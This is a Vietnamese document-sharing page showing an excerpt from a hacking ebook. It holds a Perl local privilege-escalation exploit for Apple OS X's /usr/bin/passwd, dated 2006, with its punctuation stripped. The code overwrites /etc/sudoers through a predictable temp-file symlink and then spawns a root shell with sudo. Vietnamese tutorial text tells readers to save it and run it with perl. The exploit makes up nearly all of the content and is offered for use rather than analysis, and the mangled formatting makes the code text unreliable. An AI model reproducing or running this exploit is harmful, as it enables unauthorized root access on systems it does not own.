TAILIEUCHUNG - Hacker Professional Ebook part 354

Tham khảo tài liệu 'hacker professional ebook part 354', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | Típ theo là dạng code exploit bằng perl . ai xài win thì down perl tạo đây http download. .rl vi du Code usr bin perl usr bin passwd OSX local root exploit. by vade79 v9 v9@ fakehalo realhalo Apple OSX s usr bin passwd program has support for a custom passwd file to be used instead of the standard static path. this feature has security issues in the form of editable file s being made anywheres on the disk and also writing arbitrary data to files. the first issue will only work if the file does not already exist it is done using umask 0 usr bin passwd -i file -l filename . the second issue is once a successful password change has occured usr bin passwd will insecurely re-write the passwd file to tmp .pwtmp. pid which can be predicted and linked to a file of your choice. this exploits the second issue to overwrite etc sudoers for some reason this took apple 6 or so months to patch use POSIX fake_passwd tmp xpasswd. passwd_pid 1 passwd_tempfile tmp .pwtmp. passwd_pid sudoers etc sudoers sub pexit print @_. n exit 1 print usr bin passwd OSX local root exploit. n print by vade79 v9 v9 @ fakehalo realhalo n n unlink fake_passwd print making fake password file. fake_passwd n open FP fake_passwd pexit couldn t open write to fake_passwd uid must equal the current user. print FP ALL ALL ALL ALL . getuid . . getuid . . getuid . . getuid . n close FP print sym-linking sudoers - passwd_tempfile. n symlink sudoers passwd_tempfile pexit couldn t link files. print running usr bin passwd on fake_passwd. n print use ANY password longer than 4 characters n n system usr bin passwd -i file -l fake_passwd ALL ALL ALL ALL print n running sudo sh use your REAL user password. n n system usr bin sudo sh exit 0 2006-03-01 Apple Mac OS X usr bin passwd Custom Passwd Local Root Exploit save cái đoạn code đấy thành .pl rùi chuyển vào 1 chỗ nào đấy c chẳng hạn vào cmd gõ perl c thuờng thì nó sẽ hiện lên đoạn

TAILIEUCHUNG - Chia sẻ tài liệu không giới hạn
Địa chỉ : 444 Hoang Hoa Tham, Hanoi, Viet Nam
Website : tailieuchung.com
Email : tailieuchung20@gmail.com
Tailieuchung.com là thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi hàng triệu tài liệu như luận văn đồ án, sách, giáo trình, đề thi.
Chúng tôi không chịu trách nhiệm liên quan đến các vấn đề bản quyền nội dung tài liệu được thành viên tự nguyện đăng tải lên, nếu phát hiện thấy tài liệu xấu hoặc tài liệu có bản quyền xin hãy email cho chúng tôi.
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.